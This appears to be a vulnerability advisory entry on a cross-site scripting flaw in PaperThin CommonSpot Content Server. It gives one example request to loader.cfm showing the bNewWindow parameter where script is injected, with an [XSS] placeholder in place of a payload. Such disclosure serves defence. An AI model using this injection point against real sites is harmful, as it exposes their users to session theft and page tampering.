• info
• discussion
• exploit
• solution
• references

PaperThin CommonSpot Content Server Cross-Site Scripting Vulnerability

The following example was provided:

/loader.cfm?url=/[DIRPATH]/[DIRPATH]/email-login-info.cfm&errmsg=No%20user%20account
%20was%20found%20for%20that%20email%20address.%20%20Please%20try%20again.&bNewWindo
w=[XSS]